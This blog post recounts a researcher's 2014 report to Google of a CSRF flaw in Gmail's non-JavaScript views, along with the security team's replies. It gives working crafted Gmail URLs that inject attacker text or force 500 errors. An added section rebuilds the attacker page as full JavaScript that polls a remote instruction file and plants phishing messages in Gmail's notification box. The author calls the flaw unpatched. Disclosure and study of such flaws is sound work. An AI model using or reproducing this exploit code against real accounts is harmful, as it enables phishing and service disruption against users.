How I found a CSRF vulnerability in the heart of Gmail (Google Mail) STILL UNPATCHED AS OF 31/03/2015

Here I have found a vulnerability in the most secure Gmail from Google.

IT IS STILL UNPATCHED, SO USE IT FOR EDUCATIONAL PURPOSES ONLY. DON'T TAKE IT TO THE BLACK SIDE OF YOUR THOUGHTS.




First of all, I reported this bug on 6/11/2014.

Below is the raw report that I submitted to Google.

6/11/2014
--------------------------------------------------------------------------------------------------------------------------
Hey Google Security,

I have named this bug as "Gmail's alert box as attacker's playground".
The affected views of Gmail are the mobile and desktop views (both non-JavaScript):

Desktop - https://mail.google.com/u/0/h
Mobile - https://mail.google.com/u/0/x

An attacker has full control over what message appears inside Gmail's standard notification box. He is also able to interrupt the whole Gmail service in the victim's browser, which will then return a 500 Internal Server Error from the Google server. And he can also uninterrupt or unblock the Gmail service that was blocked previously.


And the main point here is: the whole process can be done in real time, and the attacker can be in any (remote) location to control the victim's browser.
Below is my reproduction section.

The affected URL is:
https://mail.google.com/mail/u/0/h/1r492fk6i9hhd/?v=prfap&bu=pfwd&scd=1&idmc=wf<Here goes the crafted message>%3E.

This URL sets a cookie, GMAIL_NOTI, and redirects to Gmail with the message shown in Gmail's standard notification box.

Just replace the crafted message section with a payload like this: "<<<".
This will set a GMAIL_NOTI cookie. After the redirection, the server will return a 500 Internal Server Error until the GMAIL_NOTI cookie is cleared out.

How is it useful, letting an attacker control the whole process remotely? It goes below in the
"How an attacker can use this against a victim" section.

How can an attacker use this against a victim?
---------------------------------------------------------
First of all, I already mentioned that this is a lack of CSRF protection. So I am pointing to the main points only, as described below.

3 main operations an attacker is able to perform against a victim remotely:
A) Interrupt the whole Gmail service in the victim's browser,
B) Uninterrupt or unlock the previously interrupted Gmail service,
C) The most annoying point: he can put dynamic text-based ads or phishing messages in Gmail's standard alert box.

And once more: all operations controlled by the attacker happen in real time and from a remote location.

STEPS :- HOW AN ATTACKER CAN USE THIS BUG
---------------------------------------------------------------------
A) As we already know this is a kind of CSRF vulnerability, so first of all the victim needs to be served the attacker's page.
B) After the victim opens the attacker's page, he can open Gmail in a new tab and carry on as usual...
C) Now the attacker has full control over Gmail's alert box and can interrupt and uninterrupt the whole Gmail service in the victim's browser.

So below goes the brief.

REAL LIFE SCENARIO
-------------------------------
A) The victim is sent an attacker's page containing a script which is executed repeatedly, every 5 seconds.

Note: The ways of sharing are vast, and the content of the page can be anything that attracts the victim and makes him keep the page open until his browsing session ends. The URLs and techniques used here are only for explaining the bug; those used in an attack against a real user may vary. It's up to the thoughts.

Explanation of the execution of the code in the attacker's page.
------------------------------------------------------------------------
The URL that is going to be shared with the victim is:

https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googleRemoteControl.html

When he/she opens the above URL, it will just show a blank page, but the hidden script will get executed. And I know you techie guys can just read my JavaScript code in the above-mentioned page, so I am not going deeper. Below are the steps the script performs.

1) First of all, it will send a request to

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wfHey+there+whatsup+iam+shihab+over+here%3E

embedded in a script element.

2) It starts a timer with an interval of 5000 ms, i.e., every 5 seconds the script will execute repeatedly in the background.
It just grabs the content of the text file "ssoft.txt" in the current directory of the attacker's page. That file contains a JSON string which instructs the page what to do. An example of the JSON string goes below.
[
{
"message": "This is the example of Advertisement 1.Can be also some phishing.Yours",
"payload": "interruptGmail"
},
{
"message": "This is the example of Advertisement 2.Can be also some phishing.Yours"
},
{
"message": "This is the example of Advertisement 3.Can be also some phishing.Yours"
}
]

NOTE: The text file "ssoft.txt" is modified in real time from anywhere by the attacker, so that he can post text-based ads like the above. He can also make the whole Gmail service interrupted, which will be explained below. Here I use the Google Drive sync application on Windows so that I can modify the text file "ssoft.txt" in real time; Google Drive automatically synchronises the file to the servers.

3) The script then checks the 0th index of the JSON-parsed JavaScript array (i.e., as per the JSON string above it will return an array of 3 elements), and checks the "payload" attribute of that array element (0th index).
Then there are two cases:
a) If the content of payload matches the string "interruptGmail", it will create a dynamic script element and assign the src attribute of the script to the URL below

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf%3c%3e

It will block the whole Gmail service with a 500 error (already described above).
b) If the content doesn't match the string "interruptGmail", it will create a dynamic script element and assign the src attribute of the script to the URL below

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf<Message>%3E

The message section will contain one of the strings from the JSON-parsed array. The array index is chosen randomly, so the attacker can make it show random ads from the list.

Any previously blocked or interrupted Gmail (500 error) is cleared out, and the randomly chosen ad or phishing message, which is up to the attacker, is rendered in Gmail's alert box.

So that's all. With this process an attacker has different ways to exploit this, such as phishing or posting ads, etc., because it is rendered in Gmail's standard notification box.
It's up to your thoughts.

And if I missed anything or there is anything you can't understand, just reply to me.

And if you guys want to test it in real time, I have shared the "ssoft.txt" file and made it editable.

https://drive.google.com/file/d/0BybXBiqiGLDhSDdwR3Z0UGhnNTA/view?usp=sharing

--SHIHAB
----------------------------------------------------------
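The attacker-page logic that the report describes (a cross-site request made through a script element, a 5-second poll of ssoft.txt, an "interruptGmail" check on the first JSON entry, otherwise a randomly chosen message) is written out below as an added example. This is not the original googleRemoteControl.html, which is not reproduced on this page. The endpoint, the `idmc=wf<message>%3E` parameter layout and the `%3c%3e` interrupt payload are taken from the report; the function names and the injectable `random`, `fetchText` and `doc` parameters are assumptions so the logic can be exercised outside a browser.

```javascript
// Added example: the attacker-page logic described in the report, rebuilt as
// plain functions. This is NOT the original googleRemoteControl.html (not on
// the page). Endpoint, parameter layout and the "%3c%3e" interrupt payload are
// from the report; function names and the injectable `random`, `fetchText` and
// `doc` parameters are assumptions so the logic can run outside a browser.
const GMAIL_H = "https://mail.google.com/mail/u/0/h/";
const PATH_TOKEN = "17qgf1e1195tm"; // value from the report; it says any string works
const INTERRUPT_PAYLOAD = "interruptGmail";
// The report's interrupt URL: "%3c%3e" (URL-encoded "<>") right after "idmc=wf".
const INTERRUPT_URL = `${GMAIL_H}${PATH_TOKEN}/?v=prfap&bu=pfwd&scd=1&idmc=wf%3c%3e`;

// Sample ssoft.txt content, copied from the report.
const SAMPLE_INSTRUCTIONS = JSON.stringify([
  { message: "This is the example of Advertisement 1.Can be also some phishing.Yours", payload: "interruptGmail" },
  { message: "This is the example of Advertisement 2.Can be also some phishing.Yours" },
  { message: "This is the example of Advertisement 3.Can be also some phishing.Yours" },
]);

// Message URL: text placed after "idmc=wf", followed by an encoded ">" as in
// every message URL in the report.
function buildNotificationUrl(message, token = PATH_TOKEN) {
  return `${GMAIL_H}${encodeURIComponent(token)}/?v=prfap&bu=pfwd&scd=1&idmc=wf${encodeURIComponent(message)}%3E`;
}

// Decide what one 5-second tick does. Per the report only entries[0].payload
// is inspected; otherwise one message from the list is chosen at random.
function chooseAction(jsonText, random = Math.random) {
  const entries = JSON.parse(jsonText);
  if (!Array.isArray(entries) || entries.length === 0) return null;
  if (entries[0].payload === INTERRUPT_PAYLOAD) {
    return { kind: "interrupt", url: INTERRUPT_URL };
  }
  const index = Math.floor(random() * entries.length);
  return { kind: "message", url: buildNotificationUrl(String(entries[index].message)) };
}

// The cross-site GET itself: a <script src> element. A 2014 browser sent the
// victim's Gmail cookies with it and honoured the Set-Cookie and redirect in
// the response; that the response is not valid JavaScript does not matter.
function injectScript(doc, url) {
  const script = doc.createElement("script");
  script.src = url;
  doc.body.appendChild(script);
  return script;
}

// One tick: fetch the ssoft.txt text, decide, inject. Returns the action taken.
async function runTick(fetchText, doc, random = Math.random) {
  const action = chooseAction(await fetchText("ssoft.txt"), random);
  if (action) injectScript(doc, action.url);
  return action;
}

// Poll every 5000 ms as the report describes. Returns the timer handle so the
// caller can clearInterval() it.
function startPolling(fetchText, doc, intervalMs = 5000) {
  return setInterval(() => { runTick(fetchText, doc).catch(() => {}); }, intervalMs);
}
```

In a browser `startPolling((name) => fetch(name).then((r) => r.text()), document)` is the whole page. The technique depends on the browser attaching the victim's Gmail cookies to, and accepting a Set-Cookie from, a cross-site script-src response; browsers that default cookies to SameSite=Lax do neither, which is the generic mitigation for this class of cookie-planting CSRF.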

I got a response on 7/11/2014:

----------------------------------------------------------
Hey - Just letting you know that your report was triaged and we're currently looking into it. You should receive a response in a couple of days, but it might take up to a week if we're particularly busy.

Thanks,
Google Security Team
----------------------------------------------------------

After two days, I got a response back on 10/11/2014:

----------------------------------------------------------
Hey,

Thanks for your bug report. We've taken a look at your submission and can confirm this is not a security vulnerability. To be able to start an attack, the attacker would have to know the secret value in the URL (the one after /u/0/h/ ). Have you been able to obtain this value without already having access to the victim account?


Regards,
Krzysztof, Google Security Team

Krzysztof, a member of the Google Security Team, told me that it is not a security vulnerability :-), and asked a big question:
Have you been able to obtain this value without already having access to the victim account?
Sorry Krzysztof, I don't want to obtain this value, because it doesn't matter :). Below is why.
-------------------------------------------------------

On the same day, 10/11/2014, I replied to him with why:

---------------------------------------------------------------------

Hey Krzysztof,

First of all thanks for reviewing my report.

You said that an attacker would need to know a secret or kind of
XSRF string in the URL, like below.

https://mail.google.com/mail/u/0/h/17qgf1e1195tm/?v=prfap&bu=pfwd&scd=1&idmc=wf<SOME_MESSAGE>%3E

From the above URL, the secret id is: 17qgf1e1195tm.

But as per my research it is just a random value inserted in the
URL, and I can confirm that it is not an XSRF token or any kind of
secret, because

we can enter any value, by replacing the mentioned value like below.

https://mail.google.com/mail/u/0/h/shihabsoft/?v=prfap&bu=pfwd&scd=1&idmc=wf<SOME_MESSAGE>%3E

Here I have changed the value to "shihabsoft".

So it doesn't matter; the process doesn't get interrupted but goes on as normal.

To confirm, just copy and paste the below URL into your address bar.

https://mail.google.com/mail/u/0/h/shihabsoft_any_message_you_want/?v=prfap&bu=pfwd&scd=1&idmc=wfSOME_MESSAGE>%3E

So here you can confirm that it is a vulnerability, based on my
report. The ways an attacker can use this bug are vast.

And if you are in need of more details, feel free to ask...

Thanks,
SHIHAB :)
-------------------------------------------------------------------------

After that I got no response for 5 days; on the 6th day, 16/11/2014, I got a response.

-----------------------------------------------------------
Hi,

Thanks for your report. This report looks like a duplicate of another case 5-3148000005303 that is also reported by you, so I'll close this one as duplicate and process the case 5-3148000005303.
Regards,
Quan, Google Security Team.

It was just a case of duplication: I had accidentally submitted the same report twice from different emails.
--------------------------------------------------------------------------

So I tried to reopen the case 5-3148000005303 as Quan said, on the same day, 16/11/2014. He replied by asking a question:

Hi,

Thanks for your report. Whenever I click the following link:  https://mail.google.com/mail/u/0/h/anything/?v=prfap&bu=pfwd&scd=1&idmc=wfanotheranything%3E, nothing happens. It's only redirected to "Forwarding and POP/IMAP" when I copy/paste the link in the browser, so I'm not sure what is the attack's scenario. You mention that you have a kind of Proof of Concept:googleRemoteControl.html. Could you please make it work such that whenever I access it then I see the repeated alerts in my Gmail testing account?

Regards,
Quan, Google Security Team.

--------------------------------------------------------------------------

Are you getting bored? I'm thinking it's a BIG NO, because it's an interesting topic about security, and our conversation is even more interesting.

On the next day, 17/11/2014, I clarified my stand to him:

--------------------------------------------------------------------------

Hey Quan,

Sorry for the long delay in replying to you.

As you said, whenever you follow the link by clicking or copy-pasting,
nothing happens in your browser.

OK, I will take you deeper. I am referring to the alert box as Gmail's
standard notification box (in which all alerts are shown, that is, a
yellow box with text in it, not the JavaScript alert box). A picture
is provided below for better understanding.

So after you follow the link:
https://mail.google.com/mail/u/0/h/anything/?v=prfap&bu=pfwd&scd=1&idmc=wfanotheranything%3E,

the message will be shown as in the picture below.
https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googCSRF.png

And you asked me to provide the PoC googleRemoteControl.html.

It seems you haven't yet read my report carefully, because I have
already mentioned the link for that. Better to put it once more.

Just follow this URL by clicking it below.

https://googledrive.com/host/0BybXBiqiGLDhNXpqTVg5ZlpCaGs/googleRemoteControl.html

And follow the simple instructions over there.

And at last you will see that Gmail's notification box is filled
with ads posted by the attacker through his page, and maybe also
some phishing, because the message is in the heart of Gmail's page.

And I already mentioned in my report that the attacker's page
reads instructions and ads or phishing messages from a file called
"ssoft.txt" on the same attacker's server.

So the attacker has full access to the victim's alert box, and he
also has the option to interrupt the whole Gmail service in the
victim's browser, and also to uninterrupt it.
NOTE: The victim can't access the non-JavaScript versions of both mobile and
desktop Gmail in the interrupted state. But he has access to the modern or
latest UI (/u/0/ or /mu/mp). But most users facing slow internet
connections will move onto that. (Oh, it's not the topic here right
now.) So
the two main advantages of the attacker: he can be REMOTE and REAL-TIME.

And if you want to know more, just read my report carefully once more. I
have provided everything in it, including the link for ssoft.txt and how to edit
the instructions.

NOTE: If you can't access or edit ssoft.txt directly, it's not a
problem, because it is provided just for demonstration. You can
reproduce it in whatever way you want. It's up to your thoughts.

Keep in touch,
---SHIHAB :)

--------------------------------------------------------------------

AT LAST, ON THE SAME DAY, 17/11/2014, I GOT A GOOD RESPONSE FROM QUAN.

--------------------------------------------------------------------
Hi spk674,

Nice catch! Thanks for your clarification. I’ve filed a bug and will update you once we’ve got more information.

Regards,
Quan, Google Security Team
--------------------------------------------------------------------

Some conversation went on between 17/11/2014 and 20/11/2014. I don't want to bore you, my precious visitors, with reading those too. At last I got awarded on 20/11/2014 by Kevin (Google Security). I just had my name listed on the Honorable Mention page.

May I ask, is it fair? Is this the way Google handles vulnerabilities? I just got my name on the Honorable Mentions page, not even a $100 penny :). You visitors can make a decision. I have told my full story from 6/11/2014 to 20/11/2014.

And do you think I am faking you guys?

NO NEVER EVER

Just go to the URL below and search for ShihabSoft or revealedtricks4u.blogspot.com

http://www.google.co.in/about/appsecurity/hall-of-fame/distinction/

You can find my name there. Hope you understand me. Thank you very much for reading this whole post. Any doubts or queries, just express them in the comments. I am here to assist you.

:)SHIHAB

About Shihab Soft

I am Shihab, people used to call me a Security researcher or sometimes a Reverse engineer or sometimes a creepy hacker ;). Got a brain full of knowledge in different programming languages, and not more nor less I am a blogger too :).